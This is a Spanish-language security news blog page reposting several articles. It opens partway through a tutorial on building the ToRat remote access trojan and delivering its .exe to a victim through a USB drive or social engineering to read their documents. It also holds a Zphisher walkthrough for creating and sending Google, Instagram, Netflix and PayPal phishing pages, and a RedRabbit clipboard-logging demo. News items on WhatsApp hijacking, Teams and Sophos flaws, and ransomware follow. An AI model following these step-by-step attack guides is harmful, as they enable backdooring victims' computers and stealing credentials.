root@ubuntu1-VirtualBox:/home/iicybersecurity/ToRat#

Use este comando para construir un contenedor acoplable ToRat
sudo docker build. -t torat

root@ubuntu2-VirtualBox:/home/iicybersecurity/ToRat# sudo docker build . -t torat                                                 
Sending build context to Docker daemon  91.14kB
Step 1/13 : FROM lu4p/torat-pre
 ---> bb321df6530f
Step 2/13 : COPY setup_docker.sh /
 ---> Using cache
 ---> af9de545773e
Step 3/13 : COPY . /go/src/github.com/lu4p/ToRat
 ---> Using cache
 ---> b8f5f7096018
Step 4/13 : RUN mkdir -p /dist/server &amp;&amp; mkdir -p /dist/client
 ---> Using cache
 ---> ec45e33ee54b
==============================================================================================SNIP=================================================================================================
Step 11/13 : RUN mv /build/client-windows-4.0-amd64.exe /dist/client &amp;&amp; upx /dis                                                                                                             t/client/client-windows-4.0-amd64.exe
 ---> Using cache
 ---> 555b3147531b
Step 12/13 : RUN mkdir /dist_ext
 ---> Using cache
 ---> 4972cfa50297
Step 13/13 : CMD (tor -f /torrc&amp;) &amp;&amp; cp /dist /dist_ext -rf &amp;&amp; cd /dist/server/                                                                                                              &amp;&amp; ./ToRat_server
 ---> Using cache
 ---> 9c207f7efb48
Successfully built 9c207f7efb48
Successfully tagged torat:latest

PASOS DE EJECUCIÓN DE LA HERRAMIENTA

Luego, use este comando para ejecutar el contenedor
- sudo docker run -it -v “$(pwd)”/dist:/dist_ext torat

Para encontrar las opciones, use el comando Help

El paso principal de la herramienta es acceder a la máquina de la víctima enviando un archivo .exe. Encontramos el archivo .exe en la ruta mostrada a continuación: /home/iicybersecurity/ToRat/dist/dist/client# ls

Descargue el archivo client-windows-4.0-amd64.exe y envíe este archivo a la víctima a través de un pendrive o algunas técnicas de ingeniería social
Cuando las víctimas ejecutan este archivo .exe en su máquina. Podemos ver en la máquina de nuestros servidores de esta manera como un nuevo cliente conectado`

Aquí veremos qué sucede cuando la víctima ejecuta el archivo .exe en la máquina Windows
Ahora, use el comando list, para verificar el cliente conectado al servidor o podemos decir que BOT creado se puede enumerar con esta opción

Aquí enumeramos la lista de clientes
Ahora, use el comando de selección y un número de la lista de clientes. Para acceder a la máquina de la víctima. Seleccione 0 y luego presione Enter

Aquí vamos al acceso de la máquina de víctimas
Ahora, intentemos abrir cualquier documento que tenga información confidencial en la máquina víctima
Ahora estamos en la computadora de la víctima. Escriba dir command para verificar los directorios en las computadoras de las víctimas

Aquí, encontramos un directorio llamado Documentos
Ahora, ingresemos a la carpeta Documentos usando el comando cd Documentos y verifiquemos la información de la víctima

Aquí vemos la información sobre la víctima y de la misma manera, también podemos ver los documentos simplemente ingresando el nombre del archivo usando el comando type
Vemos la información completa que es muy confidencial, que se puede utilizar para cualquier actividad ilegal
La principal ventaja de usar esta herramienta es que podemos acceder a la máquina de la víctima en cualquier momento, a través de reinicios al poner el proceso de puerta trasera en el inicio. Entonces, durante el proceso de análisis forense digital, también se identifican los procesos de BOT

CONCLUSIÓN

Herramienta de hacking ToRat (Remote Administrator Tool) que funciona en la red TOR para acceder a los bots. En esta herramienta, al enviar un solo archivo .exe a la víctima, un sistema normal se puede convertir a BOT para funcionar como zombies.

El cargo HACKEAR WINDOWS 10 UTILIZANDO TORAT (HERRAMIENTA DE ADMINISTRADOR REMOTO) – PASO A PASO apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

martes, 28 de abril de 2020

¿Cómo funciona esta técnica de secuestrar WhatsApp en 2020 y cómo proteger tu WhatsApp?

Hace algunos meses fue revelado que el smartphone de Jeff Bezos fue comprometido usando un video malicioso que el fundador de Amazon recibió vía WhatsApp. Este incidente hizo que millones de usuarios comenzaran a preocuparse sobre la privacidad de sus mensajes y la seguridad de sus dispositivos, aseguran especialistas en seguridad de la información.

Si bien existen múltiples métodos para proteger una cuenta de WhatsApp, es necesario mencionar que, cuando un actor de amenazas es lo suficientemente dedicado, hábil y sigiloso, es altamente probable que pueda tomar control de la cuenta de un usuario objetivo, lo que comprometería también el dispositivo móvil de la víctima. Recientemente se reveló un nuevo método para secuestrar una cuenta de WhatsApp, que será expuesto a continuación.

Acorde a los expertos en seguridad de la información, cuando alguien compra un nuevo smartphone e instala sus cuentas y aplicaciones empleando respaldos de seguridad, WhatsApp envía al usuario un código de verificación al nuevo teléfono. Este código sirve para validar el nuevo teléfono y el usuario puede restaurar sus contactos e incluso recuperar sus conversaciones si se crearon copias de seguridad; en caso contrario, los chats aparecerán vacíos.

¿En qué consiste el ataque?

Esto abriría la puerta a los hackers, que podrían recuperar la cuenta de WhatsApp de cualquier usuario en un nuevo dispositivo con sólo interceptar el código de validación. Empleando un smartphone convencional, los hackers instalan WhatsApp y comienzan la búsqueda de una víctima potencial.

El ataque depende del acceso al smartphone de la víctima, por lo que los actores de amenaza necesitan estar cerca del usuario objetivo. Al descargar la aplicación, los hackers ingresan el número telefónico de la víctima en la cuenta nueva. Al permanecer cerca del smartphone objetivo, los hackers pueden obtener el número de verificación enviado a la víctima, lo que les permitirá validar la cuenta atacada en su propio smartphone y tomar control de la información de la víctima.

Si bien en algunos casos los hackers no cuentan con acceso a las conversaciones entre dos usuarios, sí pueden acceder a los grupos de chat, incluyendo el contenido multimedia que se comparte en WhatsApp.

¿Cómo prevenir este ataque?

Acorde a los expertos en seguridad de la información, una de las medidas de seguridad básicas es la inhabilitación de la vista previa de los mensajes SMS (y cualquier otra notificación) en la pantalla de bloqueo del smartphone. Esta función podría exponer información importante si el usuario no es lo suficientemente cuidadoso.

Además, los usuarios no deben alejarse de sus dispositivos inteligentes. Al igual que cualquier otro objeto de valor, el resguardo físico es fundamental.

Por último, el Instituto Internacional de Seguridad Cibernética (IICS) recomienda implementar la función verificación de dos pasos en WhatsApp, lo que ayuda a mitigar el riesgo de acceso por parte de un usuario no identificado. Para habilitar esta función:

Vaya a Ajustes/Cuenta/Verificación en dos pasos y haga clic en Activar. En dicho menú, ingrese un código de seis dígitos. Elija uno que pueda recordar después

Ingrese su dirección email para añadir una capa de seguridad adicional. Finalmente, verá la confirmación de la verificación en dos pasos habilitada en el smartphone

Este sencillo proceso protege a los usuarios contra este ataque y algunas variantes similares.

El cargo ¿Cómo funciona esta técnica de secuestrar WhatsApp en 2020 y cómo proteger tu WhatsApp? apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

Hackers cierran operaciones del ransomware Shade/Troldesh y liberan 750 mil claves de descifrado, ¿pero por qué?

Acorde a especialistas en seguridad web, el grupo de hackers maliciosos detrás de los ataques de ransomware empleando la variante Shade (también conocido como Troldesh) han decidido cerrar sus operaciones. Los hackers publicaron más de 750 mil claves de descifrado y se disculparon por las molestias causadas a las víctimas de sus ataques. Este grupo de hacking estuvo activo por casi seis años y, a diferencia de otros grupos operadores de ataques de ransomware, sus víctimas radicaban principalmente en Ucrania y Rusia.

Michael Gillespie, fundador de ID Ransomware (una plataforma para ayudar a las víctimas de malware de cifrado) menciona que las consultas en su sitio web relacionadas con Shade comenzaron a disminuir a finales de 2019, después de mantenerse en niveles constantes por casi tres años. Por obvias razones, esta conducta llamó la atención de la comunidad de la ciberseguridad.

Los expertos en seguridad web mencionan que la respuesta a esta interrogante finalmente llegó el pasado fin de semana, cuando los operadores de Shade crearon un repositorio en GitHub y publicaron un mensaje en el que afirmaban que dejaron de distribuir este malware desde hace algunos meses.

“Somos el equipo que desarrolló el troyano de cifrado conocido como Shade, Troldesh o Encoder.858. Detuvimos la distribución del malware a finales de 2019; hoy, hemos tomado la decisión de detener cualquier operación y publicar todas las claves de descifrado que tenemos (más de 750 mil en total).Esperamos que las compañías antivirus puedan colaborar para hacer más fácil el proceso de descifrado. Pedimos disculpas a todas las víctimas de este malware y esperamos que las claves publicadas sean de utilidad para que recuperen sus datos”, menciona la publicación en GitHub.

Además de las 750 mil claves de descifrado únicas, el repositorio incluye cinco claves maestras, instrucciones para su uso, y un enlace a una herramienta de descifrado, mencionan los expertos en seguridad web. Por otra parte, los investigadores de Kaspersky confirmaron que estas claves son legítimas después de realizar algunas pruebas.

A pesar de esto, no todas son buenas noticias, pues el uso de esta herramienta de descifrado es algo complejo, lo que puede dificultar a los usuarios con menores conocimientos técnicos recuperar su información cifrada por Shade.

El Instituto Internacional de Seguridad Cibernética (IICS) recomienda a los usuarios afectados por este malware verificar si plataformas como No More Ransom cuentan con mayores informes sobre este incidente. Otras plataformas y compañías de seguridad informática también podrían estar desarrollando una herramienta de descifrado.

El cargo Hackers cierran operaciones del ransomware Shade/Troldesh y liberan 750 mil claves de descifrado, ¿pero por qué? apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

Vulnerabilidad crítica en Real-Time Find and Replace, plugin de WordPress

Hace un par de semanas, los especialistas en concientización de ciberseguridad de Wordfence detectaron una vulnerabilidad en Real-Time Find and Replace, un popular plugin de WordPress activo en más de 100 mil sitios operados por este sistema de gestión de contenido (CMS).

De ser explotada, esta falla podría permitir a los actores de amenazas inyectar código JavaScript malicioso en cualquier sector del sitio afectado; para ello, todo lo que requieren los atacantes es engañar al administrador para que descargue un documento, haga clic en un enlace o abra un correo electrónico.

Los desarrolladores fueron notificados sobre el hallazgo el 22 de abril; horas más tarde ya había sido lanzado un parche de actualización. Esta era considerada una seria amenaza de ciberseguridad, por lo que los expertos en concientización de ciberseguridad recomiendan a los usuarios del plugin afectado actualizar a la más reciente versión (v4.0.2). A continuación, se presentan algunos detalles técnicos sobre la vulnerabilidad.

Real-Time Find and Replace proporciona una función para reemplazar dinámicamente cualquier contenido HTML en sitios de WordPress, colocando contenido nuevo sin cambiar permanentemente el contenido original. Los datos nuevos son cargados de forma inmediata, antes de que se entreguen al navegador del visitante del sitio de WordPress.

Para proporcionar esta funcionalidad, el complemento registra una página de submenú vinculada a la función far_options_page con un requisito de capacidad para activar plugins.

La función far_options_page contiene el núcleo de la funcionalidad del complemento para agregar nuevas reglas de búsqueda y reemplazo. Por desgracia, esa función no pudo utilizar la verificación nonce, por lo que la integridad de la fuente de una solicitud no es verificada durante la actualización de la regla, desencadenando una vulnerabilidad de falsificación de solicitudes entre sitios (XSRF), mencionan los expertos en concientización de ciberseguridad.

Si los actores de amenazas logran engañar al administrador del sitio objetivo para que realice alguna acción, podrían reemplazar el contenido o HTML, mostrando a los visitantes un sitio vulnerable plagado de contenido malicioso. El contenido de los atacantes se mostrará cuando el usuario entre a la página web comprometida.

Un atacante podría usar esta vulnerabilidad para reemplazar una etiqueta HTML como <head> con Javascript malicioso. Esto haría que el código malicioso se ejecute en casi todas las páginas del sitio afectado, ya que casi todas las páginas comienzan con una etiqueta HTML <head> para el encabezado de la página, lo que crea un impacto significativo si se explota con éxito.

Para mayores informes sobre vulnerabilidades, exploits, variantes de malware y riesgos de seguridad informática puede ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS), al igual que a las plataformas oficiales de las compañías tecnológicas.

El cargo Vulnerabilidad crítica en Real-Time Find and Replace, plugin de WordPress apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

lunes, 27 de abril de 2020

Vacíos en Facebook y PayPal permiten a cualquiera hackear sus cuentas. Averigüe cómo

Cada semana aparecen múltiples reportes sobre amenazas de seguridad que podrían afectar a los usuarios de redes sociales, principalmente Facebook. En esta ocasión, expertos seguridad de la información de CyberNews revelaron una estafa activa que abusa de algunas fallas de seguridad en PayPal y Facebook.

Explotando estas fallas, los actores de amenazas están robando un promedio de 1.5 millones de dólares al mes. Para ello, sólo necesitan convencer a los usuarios de Facebook de realizar envíos a direcciones controladas por los hackers.

Acorde a los expertos en seguridad de la información, el ataque puede dividirse en cuatro etapas diferentes:

Un hacker inicia sesión en una cuenta de Facebook o Messenger y comienza a enviar mensajes a los amigos del propietario real de la cuenta para pedir ayuda con un problema en su cuenta de PayPal, o bien para ofrecer la venta de algún producto. Los hackers emplean el phishing para obtener las credenciales de inicio de sesión del usuario
El cibercriminal pregunta a los amigos de la víctima si podrían recibir dinero en sus cuentas de PayPal y reenviar la misma cantidad a la cuenta bancaria operada por los hackers
Cuando el amigo recibe el dinero en su cuenta de PayPal, lo envía por transferencia bancaria a la cuenta del hacker
Los actores de amenaza utilizan la función de devolución de cargo en PayPal, que revierte el dinero enviado al amigo en primer lugar, y el amigo pierde ese dinero

Al parecer, los ataques se originan en diversas partes de Estados Unidos, Rusia y Reino Unido, y los principales objetivos son usuarios de Facebook británicos.

Los expertos en seguridad de la información contactaron a algunos informantes en la comunidad del hacking malicioso, quienes revelaron que los cibercriminales detrás de esta campaña emplean algunos simples vacíos de seguridad presentes en PayPal, Facebook e incluso en algunos bancos.

Recientemente, CyberNews también reveló el hallazgo de seis vulnerabilidades críticas en el sistema de pagos PayPal que podrían ser explotadas por hackers maliciosos para acceder fácilmente a las cuentas de los usuarios; hasta el momento, PayPal aún no ha corregido todas las fallas reportadas.

Al respecto, un representante del sistema de pagos mencionó: “Los riesgos de seguridad son un asunto muy serio para nosotros, empleamos avanzadas herramientas de gestión de riesgos y fraudes para proteger a nuestros clientes y sus pagos”.

Para mayores informes sobre vulnerabilidades, exploits, variantes de malware y riesgos de seguridad informática puede ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS), al igual que a las plataformas oficiales de las compañías tecnológicas.

El cargo Vacíos en Facebook y PayPal permiten a cualquiera hackear sus cuentas. Averigüe cómo apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

Hackear equipos de Microsoft con sólo una imagen GIF

A medida que incrementa el uso de plataformas de videoconferencia para el trabajo desde casa, sigue la batalla entre las grandes compañías tecnológicas en busca de apoderarse de un mercado muy poco explotado antes de la pandemia. Este incremento en el uso de estos recursos también ha revelado múltiples fallas de seguridad, aseguran expertos de un curso de pentesting.

Uno de los riesgos de seguridad más recientes tiene que ver con un GIF malicioso que podría haber estado robando información de algunas cuentas de Microsoft Teams mediante la explotación de una vulnerabilidad para tomar control completo de las redes de una organización. Este problema fue detectado desde finales de febrero, y se sabe que siguió activo hasta hace un par de semanas. La vulnerabilidad fue corregida el pasado 20 de abril, por lo que se espera que no se presenten más ataques similares.

Acorde a los expertos del curso de pentesting, esta vulnerabilidad estaba presente en todas las versiones de Microsoft Teams para equipos de escritorio y para navegador web. El problema reside en la forma en que este software administra los tokens de autenticación para la visualización de imágenes.

Microsoft maneja esos tokens en su servidor ubicado en teams.microsoft.com o en cualquier subdominio bajo esa dirección. Los investigadores de CyberArk descubrieron que era posible secuestrar dos de esos subdominios (aadsync-test.teams.microsoft.com y data-dev.teams.microsoft.com) con fines maliciosos.

Al parecer, si un actor de amenazas lograba que un usuario objetivo visitara uno de los subdominios comprometidos, los tokens de autenticación podrían pasar a un servidor controlado por los hackers. Posteriormente, los actores de amenazas podrían crear un “token skype” para obtener acceso a las implementaciones de Microsoft Team.

Hasta este punto, esta pareciera una campaña de phishing convencional. No obstante, los expertos identificaron el uso de un GIF malicioso (una imagen del Pato Donald); al visualizar este archivo, se forzaría a los equipos comprometidos a renunciar al token de autenticación, por ende renunciando a sus datos. Acorde a los expertos del curso de pentesting, esto se debe a que la fuente del GIF era un subdominio comprometido y los equipos se comunicarán automáticamente con ellos para ver la imagen.

Esta variante de ataque podría haber sido explotada para crear un gusano para desplegar ataques posteriores. En el reporte, los investigadores mencionan que el hecho de que los atacantes solo requieran que el usuario objetivo visualizara un GIF, hacían de esta una variante muy peligrosa, además de un punto de acceso a otras áreas de la red.

Acorde al Instituto Internacional de Seguridad Cibernética (IICS), Microsoft corrigió la vulnerabilidad de inmediato, además de que la compañía se encuentra monitoreando las implementaciones de Microsoft Team en busca de cualquier actividad maliciosa relacionada con esta plataforma.

El cargo Hackear equipos de Microsoft con sólo una imagen GIF apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

Invitaciones de Recursos Humanos a sesiones de Zoom podrían causar pérdida de empleos y de información confidencial

Una de las conductas más notables durante las semanas de distanciamiento social y trabajo desde casa ha sido el uso de herramientas de comunicación remota, como la plataforma de videoconferencias Zoom. No obstante, los expertos de una consultoría de protección de datos también han descubierto múltiples fallas de seguridad que podrían exponer a los usuarios de estos servicios.

El más reciente hallazgo relacionado con Zoom se refiere a un ataque de phishing en el que los actores de amenazas se hacen pasar por notificaciones de invitaciones a una sesión de videoconferencia, solicitando al usuario objetivo que se una a una llamada por motivos laborales. Para esto, las víctimas potenciales deberán registrarse e iniciar sesión en una página de phishing de Zoom, con lo que los cibercriminales podrán extraer sus credenciales de acceso.

En un reporte elaborado por la consultoría de protección de datos de Abnormal Security, se menciona que los actores de amenazas tratan de aprovecharse de la incertidumbre por la que atraviesan miles de trabajadores, pues la mayoría de estas notificaciones de phishing se relacionan con supuestos departamentos de Recursos Humanos que notifican al usuario objetivo sobre su despido.

Como en cualquier otra campaña de phishing, los hackers crean una página y dirección email de apariencia legítima y con mensajes convincentes para las víctimas potenciales. Debido a que muchos usuarios no cuentan con conocimientos de ciberseguridad, es altamente probable que caigan en la trampa.

El mensaje recibido por el usuario objetivo contiene un enlace a la página falsa de Zoom (con dirección zoom-emergency.myftp.org), donde se le solicita iniciar sesión. Los enlaces a la página de suplantación de identidad están ocultos en el texto utilizado en las notificaciones de reuniones automáticas como “Únase a esta reunión en vivo”.

Si el ataque es completado con éxito, los actores de amenaza podrán extraer las credenciales de inicio de sesión de las víctimas, comprometiendo por ende cualquier información almacenada en la cuenta de Zoom de los usuarios afectados, mencionan los expertos de la consultoría de protección de datos.

Acorde al Instituto Internacional de Seguridad Cibernética (IICS), esta campaña de phishing tiene un alto grado de efectividad debido al contexto en el que se está llevando a cabo. Miles de empresas están experimentando serias dificultades económicas, por lo que los trabajadores saben que el riesgo de perder sus empleos es real. Además, tanto la apariencia del sitio falso como la redacción del mensaje cuentan con una elaboración detallada, por lo que no es complicado que los apresurados empleados expongan sus credenciales de acceso a los hackers.

El cargo Invitaciones de Recursos Humanos a sesiones de Zoom podrían causar pérdida de empleos y de información confidencial apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

Vulnerabilidad de inyección SQL en Sophos XG firewall permite a los hackers configurar el firewall

Durante la semana pasada, el equipo de seguridad de aplicaciones de la firma de soluciones de ciberseguridad Sophos recibió un reporte sobre una implementación de XG Firewall que presentaba un valor sospechoso visible en la interfaz de administración. Después de realizar una investigación, la compañía determinó que este era un ataque contra sus unidades físicas y virtuales de firewall.

Al parecer, el ataque afectó a los sistemas configurados con la interfaz de administración y el portal del usuario expuesto en la zona WAN. Además, las implementaciones de firewall con configuración manual manualmente también se ven afectadas.

Respecto a la variante de ataque empleada por los actores de amenazas, los expertos en seguridad de aplicaciones mencionan que fue explotada una vulnerabilidad de inyección SQL de forma previa a la autenticación para obtener acceso a los firewall expuestos. Los datos robados de cualquier firewall afectado incluyen los nombres de usuario locales y contraseñas hash de cualquier cuenta de usuario local. Esto incluye administradores de dispositivos locales, cuentas de portal de usuario y cuentas utilizadas para acceso remoto.

En respuesta al incidente, Sophos comenzó una investigación inmediata tratando de recuperar y analizar cualquier dato relacionado con el ataque e implementando una mitigación temporal en todas las versiones de firewall afectadas. Esta medida eliminó la vulnerabilidad SQL, limitando el alcance del ataque. Además, los expertos en seguridad de aplicaciones de Sophos emitieron un mensaje para que los administradores de sistemas identifiquen si su implementación se ha visto comprometida.

Escenario 1: Implementación libre de compromiso

Escenario 2: Implementación comprometida

Los administradores de implementaciones de XG Firewall libres de ataque no requieren realizar acciones adicionales. Por otra parte, los administradores de dispositivos atacados que han recibido las actualizaciones de emergencia deben realizar los siguientes pasos para completar la corrección de este inconveniente:

Restablecer todas las cuentas de administrador del dispositivo
Reiniciar los dispositivos afectados
Restablecer contraseñas para todas las cuentas de usuarios locales
Aunque las contraseñas cuentan con cifrado, se recomienda restablecerlas para cualquier cuenta donde las credenciales de XG Firewall pudieran haberse reutilizado

Hasta el momento se desconoce la existencia de algún ataque adicional, no obstante, se recomienda implementar los pasos de mitigación a la brevedad.

Para mayores informes sobre vulnerabilidades, exploits, variantes de malware y riesgos de seguridad informática puede ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS), al igual que a las plataformas oficiales de las compañías tecnológicas.

El cargo Vulnerabilidad de inyección SQL en Sophos XG firewall permite a los hackers configurar el firewall apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

Crear páginas de phishing de 29 sitios en pocos minutos

INTRODUCCIÓN

El ataque de suplantación de identidad (phishing) se está extendiendo en internet. La mayoría de los hackers trabajan en estas páginas de phishing para averiguar sus credenciales. Este tipo de ataques se realizan simplemente enviando enlaces y provocando que la víctima haga clic en el enlace. La intención principal de este ataque es robar el nombre de usuario y las contraseñas, las credenciales bancarias y otra información confidencial. El investigador de hacking ético del Instituto Internacional de Seguridad Cibernética (IICS) demostró una exposición reciente de un ataque de phishing en AirBNB.

Hoy le mostraremos cómo crear una página de phishing de 29 sitios web diferentes en minutos. Zphisher es una herramienta que puede usarse para crear páginas de phishing y enviar a la víctima para robar la información confidencial.

ENTORNO

Sistema Operativo: Kali Linux 2019.3 64 bit

Versión de Kernel: 5.2.0

INSTALACIÓN

Use este comando para clonar: git clone https://ift.tt/33Jxedr

root@kali:/home/iicybersecurity# git clone https://github.com/htr-tech/zphisher
 Cloning into 'zphisher'...
 remote: Enumerating objects: 39, done.
 remote: Counting objects: 100% (39/39), done.
 remote: Compressing objects: 100% (38/38), done.
 remote: Total 873 (delta 17), reused 2 (delta 0), pack-reused 834
 Receiving objects: 100% (873/873), 9.69 MiB | 1.28 MiB/s, done.
 Resolving deltas: 100% (346/346), done.

Use el comando cd para ingresar al directorio zphisher
- cd zphisher

root@kali:/home/iicybersecurity# cd zphisher/
 root@kali:/home/iicybersecurity/zphisher#

Luego, use el comando para cambiar el modo de acceso
- chmod + x zphisher.sh

root@kali:/home/iicybersecurity# chmod +x zphisher.sh 
root@kali:/home/iicybersecurity#

Ahora, use el comando para lanzar la herramienta
- bash zphisher.sh

Aquí vemos 29 módulos de phishing, usemos los cuatro módulos principales

GOOGLE

Elija la opción 3 para Google y luego seleccione 2
Al crear esta página, seleccionaremos la opción LocalHost para alojar la página en nuestra máquina local para fines de prueba
También mostraremos cómo se puede crear esta página para compartirla con la víctima en Internet usando el proxy inverso. Esto se hará en las próximas páginas de phishing

Ahora, tenemos el enlace de phishing y podemos probar este enlace en nuestra máquina
Cuando abrimos esto en nuestra máquina, se le pedirá que ingrese las credenciales y la página será similar al inicio de sesión original de Gmail

Podemos ver cómo la página de phishing capturó las credenciales

Aquí, vemos las credenciales de inicio de sesión de la víctima

INSTAGRAM

Elige la opción 2 para Instagram
Ahora seleccione el proxy inverso que se utilizará para capturar las credenciales en su máquina de hackeo. Usaremos ngrok.io

Ahora, tenemos el enlace de phishing y enviamos este enlace de phishing a la víctima en Internet por correo electrónico o alguna aplicación de mensajería

Podemos ver cómo la página de phishing capturó las credenciales de inicio de sesión de la víctima

NETFLIX

Ahora elija la opción 5, Netflix y seleccione una opción para capturar el tráfico

Ahora, tenemos el enlace de phishing y enviamos este enlace de phishing a la víctima

Vemos la página de phishing de Netflix de esta manera

Aquí tenemos los detalles de inicio de sesión de la víctima

PAYPAL

Elija la opción 6, Paypal y seleccione una opción para capturar el tráfico

Ahora, tenemos el enlace de phishing y enviamos este enlace de phishing a la víctima

Vemos la página de phishing de PayPal de esta manera

Aquí tenemos los detalles de inicio de sesión de la víctima

CONCLUSIÓN

De esta forma, los atacantes pueden robar nuestras credenciales de inicio de sesión y otra información confidencial. Tenemos más seguridad al hacer clic en cualquier enlace.

El cargo Crear páginas de phishing de 29 sitios en pocos minutos apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente

domingo, 26 de abril de 2020

REDRABBIT, herramienta de hacking ético para equipo rojo – redteam

¿QUÉ ES WINDOWS POWERSHELL?

PowerShell es un shell de línea de comandos y lenguaje de scripting integrado en .Net framework. Todos los administradores de sistemas de Windows, Mac y Linux (pwsh) usan PowerShell, que les permite acceder a los almacenes de datos mediante un cmdlet.

¿Qué es CMDLET?

El cmdlet se usa para realizar operaciones en PowerShell (como Obtener, Agregar, Establecer, Actualizar). En PowerShell, hay 200 cmdlets.

¿QUÉ ES REDRABBIT?

RedRabbit es una herramienta utilizada para recolectar información, puede ser empleada por #RedTeam para el hacking ético. RedRabbit cuenta con múltiples opciones (Reconocimiento rápido, Subred de escaneo, Registrador del portapapeles, Escáner de red, Resolver DNS, Brute Force ZIP, Brute WinRM, Prueba de conexión de extracción y mostrar reglas locales de rechazo de firewall).

INSTALACIÓN DE REDRABBIT

Descargue directamente el zip de RedRabbit en su máquina Windows y extraiga el archivo
Use este enlace para descargar RedRabbit:

https://github.com/securethelogs/RedRabbit/archive/master.zip

Cuando ejecutemos la herramienta por primera vez, recibiremos un mensaje de error que menciona que “la política de ejecución está restringida”
Para resolver este problema, abra Windows PowerShell como administrador y ejecute el comando Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope LocalMachine

Ahora seleccione la opción [A] Sí a todo
Cambiar el directorio usando el comando cd RedRabbit-master
Ahora ejecute la herramienta .\Redrabbit.ps1

EJECUTAR REDRABBIT

En RedRabbit podemos ver diferentes tipos de opciones. Mostraremos algunas de ellas a continuación

RECONOCIMIENTO RÁPIDO

Quick Recon mostrará detalles completos sobre su sistema, como nombre de usuario/host, detalles de red, información de usuario, información de privilegios, información de administrador local y miembros, información de usuario local, información del programa (archivos), prueba de acceso a Internet e información completa de firewall.

ESCANEAR SUBRED

Esta herramienta escanea todas las IP que están conectadas a la red de área local (LAN) y muestra los puertos abiertos de todas y cada una de las IP.

REGISTRO DEL PORTAPAPELES

Esta es una opción muy importante y el concepto detrás de esto también puede ser utilizado por desarrolladores de malware para copiar el contenido del portapapeles, incluyendo contraseñas, números de tarjeta de crédito, CVV y otros detalles del usuario objetivo. Esta herramienta extrae la información que se copia al portapapeles. Veamos los pasos de ejecución:

Seleccione la opción 3, le pedirá que elija la opción P (Pastebin) o F (Archivo). Ingrese la letra “F”
Ahora, le pide que ingrese la ubicación del archivo. Aquí creamos una carpeta llamada temp en C: Drive y creamos un archivo de texto llamado file.txt. La ruta completa del archivo es C:\temp\file.txt
Ingrese C:\temp\file.txt en la ubicación de la ruta del archivo.
Ahora vaya a Google y busque números de tarjeta de crédito de muestra, tomaremos un número de tarjeta de crédito de muestra y lo copiaremos usando Crtl+C y verificaremos si hemos capturado el contenido del portapapeles en un archivo o no.
Después de copiar el número de tarjeta de crédito. Abra la carpeta C:\temp\file.txt y tendrá todos los datos del portapapeles

Ahora vamos a abrir el archivo “file.txt”. Para verificar si la información se captura o no como se muestra a continuación:

Podemos ver la información que hemos capturado
Es una herramienta muy peligrosa, porque si esta herramienta está instalada en suin sistema objetivo, el atacante puede capturar fácilmente todos los detalles del portapapeles

OSINT (INVESTIGACIÓN DE CÓDIGO ABIERTO)

Seleccione la opción “A”. Esto capturará todos los subdominios del dominio de destino

CONCLUSIÓN

Podemos usar esta herramienta durante las primeras etapas de las pruebas de penetración y de esta forma capturar información detallada sobre el objetivo.

El cargo REDRABBIT, herramienta de hacking ético para equipo rojo – redteam apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.

Ver Fuente